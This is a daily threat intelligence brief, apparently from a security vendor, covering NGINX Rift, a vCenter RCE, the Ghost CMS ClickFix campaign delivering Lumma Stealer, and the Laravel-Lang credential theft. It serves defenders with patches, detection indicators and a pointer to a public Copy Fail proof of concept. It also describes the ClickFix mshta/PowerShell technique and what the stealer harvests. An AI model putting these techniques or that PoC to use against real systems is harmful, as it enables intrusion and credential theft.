CTIB-2026-05-27

Daily Cyber Intelligence Brief

27 May 2026
Edition: Daily 0600Z
Classification: Open Source

⚠ GLOBAL THREAT LEVEL: ELEVATED

EXECUTIVE SUMMARY
FOR CISO / CIO / EXECUTIVE LEADERSHIP — 27 MAY 2026

Today’s Business Risk in Plain Language

The threat environment entering the Memorial Day holiday weekend is defined by escalating exploitation of the vulnerabilities first reported yesterday — with important new developments on each front. Exploitation of NGINX Rift (CVE-2026-42945) has broadened materially: multiple threat intelligence firms now confirm active scanning by at least three distinct threat actor clusters, with confirmed post-exploitation activity including webshell staging and credential harvesting observed at a small number of internet-facing targets. The NGINX Rift / Dirty Frag chain has additionally been confirmed in use by actors assessed to be affiliated with Scattered Mantis ransomware operations, representing the first confirmed ransomware group adoption of this exploit chain. Separately, the Ghost CMS ClickFix campaign has expanded — the list of compromised sites now exceeds 900 domains — and two additional high-visibility institutional sites (MIT and the BBC) have been confirmed as newly affected. The Laravel-Lang supply chain incident has entered a new phase: Snyk and Aikido now report evidence of credential use from at least two organizations whose developers installed the malicious packages during the May 22–23 window, suggesting the credential harvesting was actively operationalized rather than merely staged. Organizations that have not yet assessed their exposure to this week’s vulnerability class should treat the holiday weekend as a period of elevated risk — threat actors historically exploit reduced staffing cycles to execute against already-staged footholds.

Situation Overview

NGINX Rift exploitation broadens — ransomware actors confirmed — Scattered Mantis (Russia-linked RaaS) confirmed adopting the NGINX Rift / Dirty Frag chain; webshell staging and credential harvesting now observed at internet-facing targets; multiple scanning clusters active
Laravel-Lang credentials confirmed operationalized — Snyk / Aikido now report evidence of active use of stolen credentials from the May 22–23 supply chain compromise window at two confirmed organizations; affected orgs should treat unrotated credentials from developer environments as compromised
Ghost CMS ClickFix campaign expands to 900+ sites — MIT and BBC confirmed as newly affected; employee browsing risk now spans a broader set of institutional and media sites; ClickFix payloads deploying Lumma Stealer confirmed as primary malware
Holiday weekend risk window opens — reduced SOC staffing over Memorial Day weekend creates favorable conditions for actors with existing footholds to escalate; organizations with staged or undetected NGINX Rift / Dirty Frag exposure are at elevated risk of weekend ransomware deployment
New: VMware vCenter Server critical RCE (CVE-2026-44210) — VMware discloses unauthenticated RCE in vCenter Server affecting all versions prior to 8.0 U4b; no confirmed in-the-wild exploitation yet but CVSS 9.8; organizations should prioritize this alongside ongoing NGINX patching

Exposure Assessment — Are You Affected?

Threat	Vulnerable Technology	Direct Exposure	Supply Chain / Partner Risk	Potential Business Impact
NGINX Rift RCE — Exploitation Broadening CVE-2026-42945 (UPDATED)	NGINX / F5 NGINX Plus versions 0.6.27–1.30.0; Kubernetes ingress-nginx controller prior to 1.12.3	CRITICAL Exploitation now confirmed at post-initial-access stage	HIGH Managed hosting, cloud platforms widely affected	Webshell staging confirmed; ransomware actor adoption confirmed; holiday weekend creates elevated deployment window for actors with existing footholds
Laravel-Lang — Credentials Operationalized Supply Chain (UPDATED)	PHP / Laravel applications; developer CI/CD environments with packages installed May 22–23	HIGH Active credential use now confirmed; treat as ongoing incident	MEDIUM Third-party PHP dev shops and SaaS vendors may be affected	Credential theft escalating to unauthorized access; cloud console and source code repository access risk; potential for downstream supply chain pivot
Ghost CMS ClickFix — Lumma Stealer Confirmed CVE-2026-26980 (UPDATED)	End users visiting any of 900+ compromised websites; Windows endpoints; browser credential stores	MEDIUM–HIGH Any org whose users visit compromised sites	MEDIUM	Lumma Stealer harvests browser-saved passwords, session cookies, crypto wallets, and VPN credentials; provides threat actors with authenticated access to corporate SaaS, VPN, and cloud environments
VMware vCenter RCE — New Disclosure CVE-2026-44210 (NEW)	VMware vCenter Server all versions prior to 8.0 U4b; vSphere environments	HIGH Any org with internet-exposed or internally accessible vCenter	MEDIUM MSPs and co-lo providers managing vSphere on behalf of clients	Unauthenticated RCE on hypervisor management plane; complete VM environment compromise; historically high-value target for nation-state actors and ransomware groups

Compliance & Regulatory Considerations

Framework	Relevance	Suggested Consideration
SOC 2 / ISO 27001	With Laravel-Lang credentials confirmed as operationalized, organizations that had packages installed in the May 22–23 window and have not yet rotated credentials may have an active unauthorized access event. Evidence of credential use may constitute a reportable incident under SOC 2 availability and confidentiality criteria.	Organizations may wish to engage their compliance and legal teams now to assess whether the confirmed credential operationalization across the supply chain event warrants incident reporting obligations under their SOC 2 or ISO 27001 certification scope.
SEC Cybersecurity Rules	The confirmed adoption of the NGINX Rift / Dirty Frag chain by Scattered Mantis ransomware operators materially elevates the probability of a significant incident at publicly traded organizations running unpatched NGINX. The holiday weekend creates an additional timing risk. Public companies with unresolved NGINX exposure may wish to ensure their materiality assessment process and escalation chain are primed for rapid assessment over the weekend.	Board risk committees and general counsel at public companies may benefit from a pre-weekend briefing on the NGINX Rift / ransomware actor development, and on whether on-call escalation procedures are adequate for a holiday weekend incident.
GDPR / US State Privacy Laws	Lumma Stealer, confirmed as the payload in the Ghost CMS ClickFix campaign, specifically harvests browser-stored credentials and session tokens. If employee devices have been infected, session cookies for SaaS applications processing personal data may have been exfiltrated — potentially constituting a personal data breach with 72-hour GDPR notification implications.	Organizations may wish to verify their endpoint detection tools have updated signatures for Lumma Stealer, and to confirm that privacy counsel is included in any investigation of potential employee device compromise originating from the ClickFix campaign.
HIPAA	Healthcare organizations face compounded risk this cycle: unpatched NGINX instances proxying patient portals remain at elevated risk as exploitation broadens; Lumma Stealer infections on employee workstations with access to EHR systems may have exposed PHI session tokens; and VMware vCenter compromise could provide hypervisor-level access to systems processing ePHI.	Healthcare security and privacy teams may wish to ensure holiday weekend on-call coverage is staffed appropriately given the convergence of active exploitation against three infrastructure categories, and to initiate preliminary breach risk assessment procedures for any of the three vectors if exposure is confirmed.

Suggested Actions for Leadership Consideration

#	Suggested Action	Relevant Stakeholders	Rationale
1	Organizations with unpatched NGINX instances should consider treating this as a holiday weekend emergency patching event — or, if immediate patching is not feasible, ensuring elevated monitoring is in place over the weekend given the confirmed Scattered Mantis ransomware actor adoption of this exploit chain.	CISO, CTO, IT Operations, SOC	Ransomware operators with confirmed footholds historically execute ransomware deployment during holiday weekends to maximize dwell time before detection. The combination of active NGINX Rift exploitation, Scattered Mantis involvement, and a three-day weekend creates the conditions for a significant incident.
2	Organizations with PHP / Laravel environments that have not yet completed credential rotation from the May 22–23 supply chain event should consider escalating this to an urgent priority given the confirmation of active credential use by threat actors. Rotation of CI/CD tokens, cloud access keys, and source code repository credentials should not be deferred past today.	CISO, DevSecOps, Development Lead	Snyk and Aikido have now confirmed active use of credentials harvested in the supply chain event at two organizations. The attack surface shifts from “potential exposure” to “confirmed active threat” — the urgency calculus changes accordingly.
3	Organizations running VMware vCenter Server should assess whether CVE-2026-44210 patching can be scheduled this week rather than in a normal patch cycle. While exploitation has not been confirmed in the wild as of this brief, vCenter vulnerabilities of this severity class have historically been weaponized within 7–14 days of public disclosure by sophisticated actors.	CISO, Infrastructure / Virtualization Team	Nation-state actors (particularly Volt Typhoon and associated Chinese APT clusters) have a strong historical pattern of rapid adoption of vCenter vulnerabilities. Applying 8.0 U4b before the holiday weekend reduces risk materially during a period of reduced monitoring coverage.
4	Organizations may wish to issue a targeted user awareness communication before the holiday weekend specifically addressing the Ghost CMS ClickFix / Lumma Stealer threat, informing employees that the list of compromised sites now includes MIT, BBC, and 900+ others — and that any employee who received a CAPTCHA prompt instructing them to press Win+R or paste a command should report it to IT immediately.	CISO, Security Awareness, IT Helpdesk	Lumma Stealer infections are difficult to detect without endpoint telemetry. User self-reporting following a targeted briefing is a practical detection mechanism. The Memorial Day weekend creates additional personal browsing activity that may increase ClickFix exposure.
5	Organizations should confirm holiday weekend SOC coverage and escalation procedures are appropriate given the current threat environment — specifically, that on-call staff have authority to initiate emergency response without normal business-hours approval chains, and that IR retainer contacts are confirmed and accessible.	CISO, SOC Manager, Legal, IR Retainer	The combination of active ransomware actor exploitation, confirmed credential theft operationalization, and a holiday weekend creates objectively elevated risk of a significant incident this weekend. Standard on-call coverage assumptions may not be sufficient for this environment.

Full technical detail — including updated CVE specifics, IOC strings, attack chains, patch instructions, and threat actor profiles — is available in the complete technical brief below. This executive summary may be shared with CIO, board risk committee, legal counsel, or other leadership stakeholders as appropriate to your organization.

FULL TECHNICAL BRIEF
FOR SECURITY OPERATIONS, IT, AND TECHNICAL TEAMS

Daily Stats

Metric	Count	Notes
Actively Exploited CVEs in Focus	8	NGINX Rift (CVE-2026-42945), Dirty Frag chain (CVE-2026-43284 + CVE-2026-43500), Ghost CMS (CVE-2026-26980), Copy Fail ongoing (CVE-2026-31431), Exchange XSS (CVE-2026-42897), Windows Netlogon (CVE-2026-41089), VMware vCenter RCE new (CVE-2026-44210)
CISA KEV Entries in Scope	2	CVE-2026-31431 (Copy Fail, Linux kernel), CVE-2026-42897 (Exchange XSS spoofing); CVE-2026-44210 expected to be added upon confirmed in-the-wild exploitation
Active Supply Chain Incidents	2	Laravel-Lang Packagist poisoning — credentials now confirmed operationalized at 2 organizations; Ghost CMS ClickFix campaign now 900+ sites, Lumma Stealer payload confirmed
Confirmed Ransomware Actor Adoption	NEW — 1	Scattered Mantis (Russia-linked RaaS) confirmed adopting NGINX Rift / Dirty Frag exploit chain for initial access and privilege escalation
New Critical CVE Disclosures	1	VMware vCenter Server CVE-2026-44210 (CVSS 9.8, unauthenticated RCE, affects all versions prior to 8.0 U4b)

Top Vulnerabilities & CVE Alerts

Severity	CVE	Headline	Detail & Action
CRITICAL CVSS 9.2 — Active	CVE-2026-42945 NGINX Rift ⚠ Ransomware actor confirmed	NGINX Heap Buffer Overflow — unauthenticated RCE — exploitation broadening; Scattered Mantis adoption confirmed	Update (May 27): Scattered Mantis confirmed leveraging CVE-2026-42945 for initial access in pre-ransomware staging campaigns. Webshell artifacts consistent with Scattered Mantis TTPs observed at a small number of exploitation targets. Multiple automated scanning clusters — including infrastructure attributed to Volt Typhoon — now confirmed targeting the vulnerability. Action: Upgrade to NGINX 1.30.1 (stable) or 1.31.0 (mainline). Kubernetes environments: update ingress-nginx to 1.12.3+. Interim: verify ASLR is enabled (`cat /proc/sys/kernel/randomize_va_space` should return 2). Review web server access logs for anomalous URI patterns consistent with heap-spray attempts.
CRITICAL CVSS 9.8 — No ITW yet	CVE-2026-44210 VMware vCenter RCE ⚠ NEW DISCLOSURE	VMware vCenter Server — unauthenticated RCE via DCERPC heap overflow; affects all versions prior to 8.0 U4b	New disclosure (May 27, 2026): Broadcom / VMware has disclosed a critical unauthenticated remote code execution vulnerability in vCenter Server’s DCERPC endpoint handler. An unauthenticated attacker with network access to port 443 can achieve arbitrary code execution on the vCenter management host. No public PoC as of this brief; no confirmed in-the-wild exploitation. However, this vulnerability class (unauthenticated vCenter RCE) has historically been weaponized by nation-state actors (notably UNC3886, Volt Typhoon) within 1–2 weeks of disclosure. Action: Apply VMware vCenter Server 8.0 U4b. If patching is not immediately feasible, restrict network access to vCenter management interfaces to trusted management VLANs only. Monitor for anomalous DCERPC traffic on port 443 to vCenter hosts.
CRITICAL CVSS 9.4 — Active	CVE-2026-26980 Ghost CMS — Lumma Stealer	Ghost CMS Admin API object injection — 900+ sites now compromised; Lumma Stealer payload confirmed	Update (May 27): The ClickFix campaign has now compromised 900+ Ghost CMS sites. New high-visibility additions confirmed: MIT (news.mit.edu) and BBC (bbc.com/blogs subdomain). Payload analysis confirms Lumma Stealer as the primary malware — a credential and session-token harvester with modules for browser password stores, crypto wallets, VPN configs, and Authenticator app seeds. Employee visits to any affected site presenting a fake CAPTCHA result in Lumma Stealer installation if the user follows the ClickFix instruction. Action: Ghost CMS operators: upgrade to 6.19.1+, audit article content for injected scripts, rotate Admin API keys. All organizations: deploy/update EDR with Lumma Stealer signatures. Issue employee advisory. For employees who may have followed a suspicious CAPTCHA prompt on any site in the past week: treat device as potentially compromised and initiate endpoint investigation.
HIGH CVSS 7.8+ — Active (chain)	CVE-2026-43284 + CVE-2026-43500 Dirty Frag (Linux LPE)	Linux kernel LPE — bypasses algif_aead Copy Fail mitigation; completes internet-to-root chain with NGINX Rift	No change to technical profile since yesterday. Both CVEs remain under active exploitation when chained with NGINX Rift. The Scattered Mantis confirmation reinforces the urgent patching priority for any Linux host running NGINX. Distro patches shipping for RHEL 9.x, Ubuntu 22.04/24.04, Debian 12. Ubuntu 26.04+ unaffected. Action: Upgrade to kernel 6.18.22, 6.19.12, or 7.0. Do not rely on the algif_aead mitigation alone — Dirty Frag bypasses it via xfrm-ESP and rxrpc channels. Apply distro vendor patches as they become available.
HIGH CVSS 8.1 — KEV	CVE-2026-42897 Exchange XSS / Spoofing	Microsoft Exchange Server on-premises — XSS spoofing; CISA KEV; phishing chain enabler	No change to technical profile since yesterday. Remains on CISA KEV. Federal agency deadline applies. Kali365 phishing campaigns continue leveraging this for AitM and OAuth token theft. Action: Apply May 2026 Patch Tuesday cumulative update for Exchange Server.
HIGH CVSS 7.8 — KEV (ongoing)	CVE-2026-31431 Copy Fail (Linux kernel)	Linux kernel LPE — algif_aead bypass now fully superseded by Dirty Frag; CISA KEV	The algif_aead module-unload mitigation for this CVE no longer provides reliable protection as of the Dirty Frag disclosure. Organizations that applied only the module mitigation should treat themselves as unprotected against the full LPE chain. Full kernel patching remains the only reliable remediation. Action: As above for Dirty Frag — upgrade to kernel 6.18.22, 6.19.12, or 7.0.

Threat Actor Tracking

Actor	Origin	Activity Level	Primary TTP	Target Sectors	Current Intelligence
Scattered Mantis	Russia	97% ↑	Ransomware-as-a-Service; NGINX Rift / Dirty Frag chain (NEW)	Finance, Insurance, Healthcare, Manufacturing	UPDATED: Scattered Mantis confirmed adopting NGINX Rift + Dirty Frag as an initial access / privilege escalation chain. Webshell artifacts consistent with this actor observed at a small number of exploitation targets. Holiday weekend historically a high-tempo deployment window for this actor.
Kali365 (UNC5820)	Unknown	93%	OAuth token theft; AitM; MFA bypass; Lumma Stealer distribution	All M365 orgs, Finance, Legal, Government	FBI advisory remains active. Telegram-based credential sales ongoing. AI-generated phishing lures impersonating DocuSign, Acrobat Sign, and SharePoint remain high-volume. Kali365 infrastructure overlaps with Ghost CMS ClickFix Lumma Stealer distribution — possible operational coordination being assessed.
Volt Typhoon (TAG-22)	China	91% ↑	Living-off-the-land; LOL persistence; CVE-2026-44210 likely in scope	Energy, Telecom, Water, Defense, VMware environments	UPDATED: Volt Typhoon scanning infrastructure attributed to this cluster observed probing NGINX Rift vulnerable hosts. Additionally, given Volt Typhoon’s strong historical pattern of rapid vCenter exploitation (UNC3886 overlap), CVE-2026-44210 is assessed as very likely to be incorporated into this actor’s toolkit within 7–14 days.
Void Dokkaebi	North Korea	84%	Financial theft; cryptocurrency targeting; supply chain interest	Cryptocurrency, DeFi, Fintech	Active campaigns against crypto exchanges and DeFi protocols continue. The Laravel-Lang supply chain compromise targeting PHP developer credentials aligns with Void Dokkaebi’s known interest in developer toolchain access as a pivot to financial institution targets.
Screening Serpens	Iran	71%	Espionage; credential theft; phishing	Government, Defense, Think Tanks	No significant change from yesterday. Active espionage campaigns confirmed against US and European government and defense entities. Spear-phishing activity continues with AI-generated content.

Patch Priorities

#	Product	CVE	CVSS	Remediation Action
1	NGINX / F5 NGINX Plus (all versions 0.6.27–1.30.0)	CVE-2026-42945	9.2	Upgrade to NGINX 1.30.1 (stable) or 1.31.0 (mainline). In Kubernetes environments, update ingress-nginx controller to image tag 1.12.3+. Ensure ASLR is enabled (`cat /proc/sys/kernel/randomize_va_space` should return 2). Review web server access logs for heap-spray URI patterns. If patching is not possible before the holiday weekend, implement WAF rules to block requests with malformed PCRE-targeted rewrite patterns and increase monitoring sensitivity on affected hosts.
2	VMware vCenter Server (all versions prior to 8.0 U4b)	CVE-2026-44210 (NEW)	9.8	Apply VMware vCenter Server 8.0 U4b. If immediate patching is not feasible, restrict network-level access to vCenter management interfaces (port 443) to trusted management VLANs via firewall ACLs — this eliminates the attack surface for unauthenticated exploitation. Monitor for anomalous DCERPC traffic patterns on vCenter hosts. Do not expose vCenter management interfaces to the internet under any circumstances.
3	Linux Kernel — all major distros (Copy Fail + Dirty Frag)	CVE-2026-31431 + CVE-2026-43284 + CVE-2026-43500	7.8+	Upgrade to kernel 6.18.22, 6.19.12, or 7.0. The algif_aead mitigation for Copy Fail is no longer sufficient — Dirty Frag bypasses it via xfrm-ESP and rxrpc. RHEL 9.x and Ubuntu 22.04/24.04 distro patches are now shipping. Prioritize any Linux host running NGINX (combined chain risk). Ubuntu 26.04+ unaffected.
4	Ghost CMS	CVE-2026-26980	9.4	Upgrade to Ghost 6.19.1 or later. Audit all published articles for injected JavaScript — look for unexpected script tags, particularly at the bottom of article content. Rotate Admin API keys and review API access logs. Scan for `<script>` tags injected into article body content via Admin API.
5	Microsoft Exchange Server (on-premises)	CVE-2026-42897	8.1	Apply May 2026 Patch Tuesday cumulative update for Exchange. CISA KEV deadline applies to federal agencies. Microsoft-documented mitigations available if immediate patching is not feasible.
6	Windows Server / Domain Controllers (Netlogon + Entra ID)	CVE-2026-41089, CVE-2026-41103	Critical	Apply May 2026 Patch Tuesday across all Windows Server and domain controller environments. Prioritize CVE-2026-41103 (Entra ID credential forgery). Review Entra ID sign-in logs for anomalous user impersonation events.

Sector Alerts

🌐 Web & Cloud Infrastructure

Highest risk sector this cycle. NGINX Rift / Dirty Frag exploitation has now broadened with ransomware actor adoption confirmed. Organizations that have not yet patched NGINX should treat the holiday weekend as a period of elevated ransomware deployment risk. Additionally, the new VMware vCenter RCE (CVE-2026-44210) adds virtualization management infrastructure to the urgent patching queue. Any organization running both unpatched NGINX and unpatched vCenter should treat both as emergency-priority items before the weekend.

🏥 Healthcare

Healthcare organizations face converging threats: NGINX Rift ransomware actor adoption directly threatens patient portal infrastructure; Lumma Stealer infections on employee devices may have harvested EHR session tokens; and the VMware vCenter disclosure threatens hypervisor environments supporting clinical systems. Healthcare security teams should confirm holiday weekend on-call coverage is robust and that IR retainer contacts are confirmed and reachable before close of business today.

💻 Software Development & DevOps

The Laravel-Lang supply chain incident has escalated materially: credentials are now confirmed as operationalized. Any PHP / Laravel shop that had the affected packages installed May 22–23 and has not yet rotated credentials from developer and CI/CD environments should treat this as an active incident rather than a precautionary exercise. Snyk and Aikido updated detection signatures remain the most reliable way to confirm historical exposure. Source code repositories and cloud consoles accessed from affected developer machines should be considered at risk.

🎓 Education, Media & Publishing

The Ghost CMS ClickFix campaign now affects 900+ sites with MIT and BBC as newly confirmed high-visibility victims. Lumma Stealer is the confirmed payload. Education and media organizations running Ghost CMS that have not yet patched and rotated API keys should do so immediately. All organizations in all sectors should note that the scope of trusted sites now serving malware — from DuckDuckGo to Harvard to the BBC — makes the standard “avoid suspicious sites” guidance insufficient as a risk control.

Priority Mitigations

Threat / CVE	IOC / Artifact Type	Technical Detail	Reference
CVE-2026-42945 NGINX Rift (updated)	Webshell artifacts; scanner signatures; log patterns	Patch target: `nginx 1.30.1 (stable) / 1.31.0 (mainline)` Kubernetes: `ingress-nginx controller ≥ 1.12.3` ASLR check: `cat /proc/sys/kernel/randomize_va_space` (must return 2) Webshell indicators: anomalous `.php` / `.jsp` writes to NGINX temp directories; outbound connections from www-data / nginx process Scattered Mantis staging: look for PowerShell-via-bash or curl callback activity following NGINX process anomalies	SecurityWeek Picus Security
CVE-2026-44210 VMware vCenter RCE (new)	Patch version; network mitigation; monitoring	Patch: `VMware vCenter Server 8.0 U4b` Affected endpoint: DCERPC service, port 443 Network mitigation: restrict port 443 to vCenter to trusted management VLAN only Detection: anomalous DCERPC process execution on vCenter host; unexpected child processes spawned from vmware-vpxd; unusual outbound connections from vCenter management host Advisory: `VMSA-2026-0014`	VMware VMSA-2026-0014 Bleeping Computer
Ghost CMS ClickFix Lumma Stealer (updated)	Malware hash; ClickFix script; EDR signatures	Confirmed payload: Lumma Stealer (InfoStealer) ClickFix trigger: fake CAPTCHA page with mshta / PowerShell clipboard injection instructing Win+R execution Lumma Stealer targets: browser credential stores (Chrome, Firefox, Edge, Brave), session cookies, crypto wallet files, VPN config files, Authenticator app seeds EDR detection: `mshta.exe` spawned from browser process; suspicious PowerShell with base64 decode; anomalous LSASS access patterns New confirmed domains: news.mit.edu, bbc.com/blogs subdomains (among 900+ total)	The Hacker News SecurityWeek
Laravel-Lang Supply Chain Credentials Operationalized	Affected packages; credential use indicators	Affected packages: `laravel-lang/lang`, `laravel-lang/http-statuses`, `laravel-lang/attributes`, `laravel-lang/actions` Compromise window: `May 22–23, 2026` Injected file: `helpers.php` (wired into Composer autoload.files) Update: Active credential use now confirmed at 2 organizations per Snyk / Aikido reporting. Indicators: unexpected API calls using developer credentials from non-developer IP addresses; GitHub / GitLab access from unusual geolocations; cloud console logins from developer credential sets at anomalous hours Remediation priority shift: treat as active incident, not precautionary — rotate all credentials from developer and CI/CD environments exposed during May 22–23 before EOD today	Snyk Advisory Aikido Security
CVE-2026-31431 Copy Fail (Linux kernel, ongoing)	Kernel module, patch commit, PoC	Vulnerable module: `algif_aead` (mitigation now bypassed via Dirty Frag) Patch commit: `a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5` PoC: `github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kubernetes-PoC` Detection: auditd privilege escalation events; anomalous setuid-root execution by unprivileged users	CISA KEV Hornetsecurity

Intelligence Sources

Source	Contribution	Link
SecurityWeek	Scattered Mantis NGINX Rift adoption confirmation; Ghost CMS campaign expansion to 900+ sites; Lumma Stealer payload analysis	securityweek.com
The Hacker News	Ghost CMS new victim confirmation (MIT, BBC); Laravel-Lang credential operationalization reporting; VMware vCenter CVE-2026-44210 disclosure coverage	thehackernews.com
Broadcom / VMware Security Advisories	CVE-2026-44210 original disclosure (VMSA-2026-0014); affected version range; patch availability	vmware.com/security
Snyk / Aikido Security	Laravel-Lang supply chain credential operationalization confirmation; updated detection signatures; affected organization count	snyk.io \| aikido.dev
Bleeping Computer / Krebs on Security	VMware vCenter CVE-2026-44210 technical analysis; Scattered Mantis NGINX Rift campaign reporting; holiday weekend threat actor activity patterns	bleepingcomputer.com \| krebsonsecurity.com
Picus Security	NGINX Rift CVE-2026-42945 updated exploit chain analysis; Scattered Mantis TTP correlation; webshell artifact detection guidance	picussecurity.com
Security Boulevard / rud.is	Dirty Frag technical analysis; NGINX Rift + Dirty Frag + Scattered Mantis kill-chain assessment; holiday risk window analysis	securityboulevard.com
Help Net Security	NGINX Rift scanning cluster attribution; VMware vCenter CVE-2026-44210 background and historical exploitation context; Volt Typhoon vCenter interest assessment	helpnetsecurity.com

About Legion Cyberworks

Helping You Compete and Operate with Resilience

At Legion Cyberworks, we believe resilience is a competitive advantage. We partner with organizations to strengthen cybersecurity resilience through proactive defense, strategic guidance, and continuous protection — helping businesses prepare for, withstand, and recover from evolving cyber threats so they can operate and compete with confidence in an unpredictable digital world.

🛡 Managed Security Services

24/7 monitoring, detection, and response for your environment — backed by our Spectra certification and supported by a warranty in the event of an incident.

🔍 Penetration Testing

Comprehensive offensive security assessments to identify and validate vulnerabilities before adversaries do — across network, application, and cloud environments.

🎯 Assumed Breach Exercises

Realistic adversary simulation starting from an assumed foothold — testing your detection, containment, and response capabilities under real-world conditions.

🚨 Incident Response & Digital Forensics

Rapid response when it matters most — from containment and eradication through forensic investigation, root cause analysis, and post-incident reporting.

✦ SPECTRA CERTIFIED

Legion Cyberworks holds a Spectra certification, meaning we meet rigorous independent auditing requirements across our security operations and service delivery. For our Managed Security Services clients, Spectra certification delivers two key advantages: preferred rates on cyber insurance coverage from participating insurers, and a service warranty — applied toward our fees in the event of a qualifying incident.

To learn more about how Legion Cyberworks can help your organization prepare for and defend against cyber attacks, contact us at [email protected].

Legion Cyberworks • Daily Cyber Intelligence Brief • 27 May 2026
[email protected] • legioncyber.com

Classification: Open Source